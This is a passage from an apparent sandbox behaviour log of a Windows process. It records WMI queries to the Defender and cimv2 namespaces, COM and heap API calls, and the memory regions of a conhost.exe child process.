out: pToken=0x1b62f930) returned 0x0 [0352.262] CoUninitialize () Thread: id = 299 os_tid = 0x1080 Thread: id = 303 os_tid = 0x1088 [0332.055] CoGetContextToken (in: pToken=0x1b86fdd0 | out: pToken=0x1b86fdd0) returned 0x0 [0332.056] CObjectContext::QueryInterface () returned 0x0 [0332.056] CObjectContext::GetCurrentThreadType () returned 0x0 [0332.056] Release () returned 0x0 [0332.056] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0332.056] RoInitialize () returned 0x1 [0332.056] RoUninitialize () returned 0x0 Thread: id = 304 os_tid = 0x10e4 Thread: id = 306 os_tid = 0x1100 Thread: id = 307 os_tid = 0x1174 Thread: id = 328 os_tid = 0x117c Thread: id = 329 os_tid = 0x11b0 [0347.146] GetCurrentThreadId () returned 0x11b0 [0347.146] GetProcessHeap () returned 0x510000 [0347.146] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x28) returned 0x1a7dc840 [0347.147] WMIExtendedObjectToInstance () returned 0x0 [0347.148] _wcsicmp (_String1="MSFT_WmiError", _String2="CIM_Error") returned 10 [0347.148] _wcsicmp (_String1="MSFT_WmiError", _String2="__Parameters") returned 14 [0347.148] _wcsicmp (_String1="MSFT_WmiError", _String2="__ExtendedStatus") returned 14 [0347.148] ?GetMiClass@DynamicSchema@@UEAAJPEBG00PEAPEBU_MI_Class@@@Z () returned 0x80041002 [0347.148] ClassCache_GetClass () returned 0x6 [0347.148] ResultToHRESULT () returned 0x80041002 [0347.148] GetCurrentThreadId () returned 0x11b0 [0347.149] PublishDebugMessage () returned 0x1 [0347.149] WbemLocator:IUnknown:AddRef (This=0x1a8a8af0) returned 0x2 [0347.149] GetProcessHeap () returned 0x510000 [0347.149] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x40) returned 0x1a89fc30 [0347.149] LocaleNameToLCID (lpName="en-US", dwFlags=0x0) returned 0x409 [0347.149] _vsnwprintf (in: _Buffer=0x1b8edb78, _BufferCount=0x9, _Format="MS_%x", _ArgList=0x1b8eda58 | out: _Buffer="MS_409") returned 6 [0347.149] SetThreadToken (Thread=0x0, Token=0x808) returned 1 [0347.149] GetCurrentThreadId () returned 0x11b0 [0347.149] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1a8a8af0, strNetworkResource="root/Microsoft/Windows/Defender", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1b8edad8 | out: ppNamespace=0x1b8edad8*=0x1b66d730) returned 0x0 [0347.160] CoSetProxyBlanket (pProxy=0x1b66d730, dwAuthnSvc=0xffffffff, dwAuthzSvc=0xffffffff, pServerPrincName=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x40) returned 0x0 [0347.160] GetProcessHeap () returned 0x510000 [0347.160] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x40) returned 0x1a89fa50 [0347.160] GetProcessHeap () returned 0x510000 [0347.160] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x30) returned 0x1b67d460 [0347.161] WbemLocator:IUnknown:AddRef (This=0x1b66d730) returned 0x2 [0347.161] GetProcessHeap () returned 0x510000 [0347.161] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a89fc30) returned 1 [0347.161] PublishDebugMessage () returned 0x1 [0347.161] WbemLocator:IUnknown:Release (This=0x1a8a8af0) returned 0x1 [0347.161] GetProcessHeap () returned 0x510000 [0347.161] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x1a8a8ad0 [0347.161] IWbemServices:GetObject (in: This=0x1b66d730, strObjectPath="MSFT_WmiError", lFlags=0, pCtx=0x1a832a80, ppObject=0x1b8edc28*=0x0, ppCallResult=0x0 | out: ppObject=0x1b8edc28*=0x1a7eb650, ppCallResult=0x0) returned 0x0 [0347.170] GetProcessHeap () returned 0x510000 [0347.170] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a8a8ad0) returned 1 [0347.170] IWbemClassObject:Get (in: This=0x1a7eb650, wszName="__CLASS", lFlags=0, pVal=0x1b8edb88*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1b8edb88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_WmiError", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0347.170] IWbemClassObject:Get (in: This=0x1a7eb650, wszName="__NAMESPACE", lFlags=0, pVal=0x1b8edb58*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1b8edb58*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\Microsoft\\Windows\\Defender", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0347.170] IWbemClassObject:Get (in: This=0x1a7eb650, wszName="__SUPERCLASS", lFlags=0, pVal=0x1b8edb70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1b8edb70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Error", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0347.170] ?GetMiClass@DynamicSchema@@UEAAJPEBG00PEAPEBU_MI_Class@@@Z () returned 0x80041002 [0347.170] ClassCache_GetClass () returned 0x6 [0347.170] ResultToHRESULT () returned 0x80041002 [0347.170] GetCurrentThreadId () returned 0x11b0 [0347.170] PublishDebugMessage () returned 0x1 [0347.170] WbemLocator:IUnknown:AddRef (This=0x1a8a8af0) returned 0x2 [0347.171] GetProcessHeap () returned 0x510000 [0347.171] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x40) returned 0x1a89fc30 [0347.171] _wcsicmp (_String1="root/Microsoft/Windows/Defender", _String2="ROOT/Microsoft/Windows/Defender") returned 0 [0347.171] _wcsicmp (_String1="ROOT/Microsoft/Windows/Defender", _String2="root/Microsoft/Windows/Defender") returned 0 [0347.171] WbemLocator:IUnknown:AddRef (This=0x1b66d730) returned 0x3 [0347.171] GetProcessHeap () returned 0x510000 [0347.171] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a89fc30) returned 1 [0347.171] PublishDebugMessage () returned 0x1 [0347.171] WbemLocator:IUnknown:Release (This=0x1a8a8af0) returned 0x1 [0347.171] GetProcessHeap () returned 0x510000 [0347.171] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x1a8a8e50 [0347.172] IWbemServices:GetObject (in: This=0x1b66d730, strObjectPath="CIM_Error", lFlags=0, pCtx=0x1a832a80, ppObject=0x1b8eda98*=0x0, ppCallResult=0x0 | out: ppObject=0x1b8eda98*=0x1a7eb9c0, ppCallResult=0x0) returned 0x0 [0347.179] GetProcessHeap () returned 0x510000 [0347.179] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a8a8e50) returned 1 [0347.179] IWbemClassObject:Get (in: This=0x1a7eb9c0, wszName="__CLASS", lFlags=0, pVal=0x1b8ed9f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1b8ed9f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Error", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0347.179] IWbemClassObject:Get (in: This=0x1a7eb9c0, wszName="__NAMESPACE", lFlags=0, pVal=0x1b8ed9c8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1b8ed9c8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\Microsoft\\Windows\\Defender", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0347.179] IWbemClassObject:Get (in: This=0x1a7eb9c0, wszName="__SUPERCLASS", lFlags=0, pVal=0x1b8ed9e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1b8ed9e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0347.179] WMIObjectToClass () returned 0x0 [0347.182] ResultToHRESULT () returned 0x0 [0347.182] ClassCache_AddClass () returned 0x0 [0347.182] ResultToHRESULT () returned 0x0 [0347.182] WbemLocator:IUnknown:Release (This=0x1b66d730) returned 0x2 [0347.182] IUnknown:Release (This=0x1a7eb9c0) returned 0x0 [0347.182] WMIObjectToClass () returned 0x0 [0347.184] ResultToHRESULT () returned 0x0 [0347.184] ClassCache_AddClass () returned 0x0 [0347.184] ResultToHRESULT () returned 0x0 [0347.184] WbemLocator:IUnknown:Release (This=0x1b66d730) returned 0x1 [0347.184] IUnknown:Release (This=0x1a7eb650) returned 0x0 [0347.184] Instance_New () returned 0x0 [0347.184] ResultToHRESULT () returned 0x0 [0347.184] ResultToHRESULT () returned 0x0 [0347.377] RtlInterlockedWakeAll () returned 0x0 [0347.377] GetCurrentThreadId () returned 0x11b0 [0347.377] GetProcessHeap () returned 0x510000 [0347.378] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a7dc840) returned 1 [0347.378] SetThreadToken (Thread=0x0, Token=0x0) returned 1 [0347.378] PublishDebugMessage () returned 0x1 [0347.612] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x7fffbdc42060, phModule=0x1b8efbe8 | out: phModule=0x1b8efbe8*=0x7fffbdc30000) returned 1 [0347.612] TpCallbackUnloadDllOnCompletion () returned 0x7fffbdc2ffff [0347.612] PublishDebugMessage () returned 0x1 [0347.612] TpWaitForWork () returned 0x0 [0347.612] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x7fffbdc39d10, phModule=0x1b8efbe8 | out: phModule=0x1b8efbe8*=0x7fffbdc30000) returned 1 [0347.612] TpCallbackUnloadDllOnCompletion () returned 0x7fffbdc2ffff [0347.612] PublishDebugMessage () returned 0x1 [0347.612] GetCurrentThreadId () returned 0x11b0 [0347.612] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0347.612] GetCurrentThreadId () returned 0x11b0 [0347.613] GetProcessHeap () returned 0x510000 [0347.613] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x28) returned 0x1a7dccc0 [0347.613] PublishDebugMessage () returned 0x1 [0347.613] WbemLocator:IUnknown:AddRef (This=0x1a8a8af0) returned 0x2 [0347.613] GetProcessHeap () returned 0x510000 [0347.613] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x16) returned 0x1a8a8610 [0347.613] _wcsicmp (_String1="root/Microsoft/Windows/Defender", _String2="root/cimv2") returned 10 [0347.613] _wcsicmp (_String1="root/cimv2", _String2="root/Microsoft/Windows/Defender") returned -10 [0347.613] LocaleNameToLCID (lpName="en-US", dwFlags=0x0) returned 0x409 [0347.613] _vsnwprintf (in: _Buffer=0x1b8efa08, _BufferCount=0x9, _Format="MS_%x", _ArgList=0x1b8ef8e8 | out: _Buffer="MS_409") returned 6 [0347.613] SetThreadToken (Thread=0x0, Token=0x808) returned 1 [0347.613] GetCurrentThreadId () returned 0x11b0 [0347.613] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1a8a8af0, strNetworkResource="root/cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1b8ef968 | out: ppNamespace=0x1b8ef968*=0x1b66da90) returned 0x0 [0347.667] CoSetProxyBlanket (pProxy=0x1b66da90, dwAuthnSvc=0xffffffff, dwAuthzSvc=0xffffffff, pServerPrincName=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x40) returned 0x0 [0347.667] GetProcessHeap () returned 0x510000 [0347.667] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x16) returned 0x1a8a8c50 [0347.668] GetProcessHeap () returned 0x510000 [0347.668] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x30) returned 0x1b67d6a0 [0347.668] _wcsicmp (_String1="root/cimv2", _String2="root/Microsoft/Windows/Defender") returned -10 [0347.668] WbemLocator:IUnknown:AddRef (This=0x1b66da90) returned 0x2 [0347.668] GetProcessHeap () returned 0x510000 [0347.668] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a8a8610) returned 1 [0347.668] PublishDebugMessage () returned 0x1 [0347.668] WbemLocator:IUnknown:Release (This=0x1a8a8af0) returned 0x1 [0347.668] PublishDebugMessage () returned 0x1 [0347.668] ResultFromHRESULT () returned 0x0 [0347.668] CoUninitialize () [0347.668] GetCurrentThreadId () returned 0x11b0 [0347.668] GetProcessHeap () returned 0x510000 [0347.669] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a7dccc0) returned 1 [0347.669] SetThreadToken (Thread=0x0, Token=0x0) returned 1 [0347.669] PublishDebugMessage () returned 0x1 [0347.722] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a7c86d0) returned 0x7 [0347.722] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a7c86d0) returned 0x6 [0347.722] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a7c86d0) returned 0x5 [0347.722] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a7c86d0) returned 0x4 [0347.722] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a7c86d0) returned 0x3 [0347.722] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a7c86d0) returned 0x2 [0347.722] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a7c86d0) returned 0x1 [0347.722] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a7c86d0) returned 0x0 [0347.722] GetProcessHeap () returned 0x510000 [0347.723] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a8a8cb0) returned 1 [0347.723] GetProcessHeap () returned 0x510000 [0347.723] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a7c86d0) returned 1 Thread: id = 331 os_tid = 0x11c0 Thread: id = 332 os_tid = 0x11c4 [0347.880] PublishDebugMessage () returned 0x1 [0347.881] CreateThreadpoolWork (in: pfnwk=0x7fffbdc42060, pv=0x1a7c5110, pcbe=0x0 | out: pv=0x1a7c5110) returned 0x1a845860 [0347.881] TpPostWork () returned 0x3 [0347.881] PublishDebugMessage () returned 0x1 [0347.881] PublishDebugMessage () returned 0x1 Thread: id = 333 os_tid = 0x11c8 Thread: id = 334 os_tid = 0x11cc Thread: id = 336 os_tid = 0x1224 Thread: id = 338 os_tid = 0x12c8 Process: id = "14" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x50de7000" os_pid = "0x14bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0x1188" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "PXTHFFRYO7\\OqXZRaykm" bitness = "32" os_groups = "PXTHFFRYO7\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001bd08" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3166 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3167 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3168 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3169 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3170 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3171 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 3172 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 3173 start_va = 0x7ff722270000 end_va = 0x7ff722344fff monitored = 0 entry_point = 0x7ff72228e520 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 3174 start_va = 0x7fffcca30000 end_va = 0x7fffccc23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3175 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 3176 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 3177 start_va = 0x400000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3178 start_va = 0x7fffcb440000 end_va = 0x7fffcb4fcfff monitored = 0 entry_point = 0x7fffcb457070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3179 start_va = 0x7fffca790000 end_va = 0x7fffcaa56fff monitored = 0 entry_point = 0x7fffca7a1bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3180 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3181 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 3182 start_va = 0xd0000 end_va = 0x198fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3183 start_va = 0x7fffca560000 end_va = 0x7fffca5fcfff monitored = 0 entry_point = 0x7fffca575390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 3184 start_va = 0x7fffca270000 end_va = 0x7fffca36ffff monitored = 0 entry_point = 0x7fffca285ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 3185 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3186 start_va = 0x590000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 3187 start_va = 0x7fffcad80000 end_va = 0x7fffcae2dfff monitored = 0 entry_point = 0x7fffcadbb940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 3188 start_va = 0x7fffcb560000 end_va = 0x7fffcb5fdfff monitored = 0 entry_point = 0x7fffcb567850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3189 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3190 start_va = 0x7fffcc830000 end_va = 0x7fffcc952fff monitored = 0 entry_point = 0x7fffcc88da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3191 start_va = 0x7fffcb600000 end_va = 0x7fffcb6a9fff monitored = 0 entry_point = 0x7fffcb615470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3192 start_va = 0x7fffcb2a0000 end_va = 0x7fffcb33afff monitored = 0 entry_point = 0x7fffcb2bc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3193 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3194 start_va = 0x480000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 3195 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3196 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3197 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 3198 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 3199 start_va = 0x480000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 3200 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 3201 start_va = 0x7fffcb7a0000 end_va = 0x7fffcb93ffff monitored = 0 entry_point = 0x7fffcb7b7a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3202 start_va = 0x7fffca760000 end_va = 0x7fffca781fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 3203 start_va = 0x7fffcc960000 end_va = 0x7fffcc989fff monitored = 0 entry_point = 0x7fffcc9648d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3204 start_va = 0x7fffca370000 end_va = 0x7fffca479fff monitored = 0 entry_point = 0x7fffca3a1300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 3205 start_va = 0x1e0000 end_va = 0x1e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3206 start_va = 0x500000 end_va = 0x52dfff monitored = 0 entry_point = 0x5014d0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3207 start_va = 0x690000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 3208 start_va = 0x7fffcb940000 end_va = 0x7fffcb96ffff monitored = 0 entry_point = 0x7fffcb9414d0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3209 start_va = 0x890000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 3210 start_va = 0xa20000 end_va = 0x1e20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 3211 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhost.exe.mui" filename = "\\Windows\\System32\\en-US\\Conhost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\conhost.exe.mui") Region: id = 3212 start_va = 0x7fffcc090000 end_va = 0x7fffcc7c0fff monitored = 0 entry_point = 0x7fffcc19e6e0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3213 start_va = 0x7fffc7c60000 end_va = 0x7fffc7cfefff monitored = 0 entry_point = 0x7fffc7c89120 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 3214 start_va = 0x1e30000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 3216 start_va = 0x1fa0000 end_va = 0x22d7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3217 start_va = 0x1e30000 end_va = 0x1ea0fff monitored = 0 entry_point = 0x1e33d40 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 3218 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 3219 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3220 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3221 start_va = 0x1e30000 end_va = 0x1f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 3222 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3223 start_va = 0x520000 end_va = 0x523fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 3224 start_va = 0x22e0000 end_va = 0x235ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 3225 start_va = 0x7fffcaa90000 end_va = 0x7fffcaba4fff monitored = 0 entry_point = 0x7fffcaaceb60 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3226 start_va = 0x7fffcb350000 end_va = 0x7fffcb424fff monitored = 0 entry_point = 0x7fffcb36d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3227 start_va = 0x2360000 end_va = 0x2487fff monitored = 0 entry_point = 0x2386140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3228 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3229 start_va = 0x2360000 end_va = 0x2441fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002360000" filename = "" Region: id = 3230 start_va = 0x530000 end_va = 0x533fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3249 start_va = 0x2450000 end_va = 0x2844fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002450000" filename = "" Region: id = 3250 start_va = 0x540000 end_va = 0x544fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 3251 start_va = 0x550000 end_va = 0x556fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 3252 start_va = 0x570000 end_va = 0x570fff monitored = 1 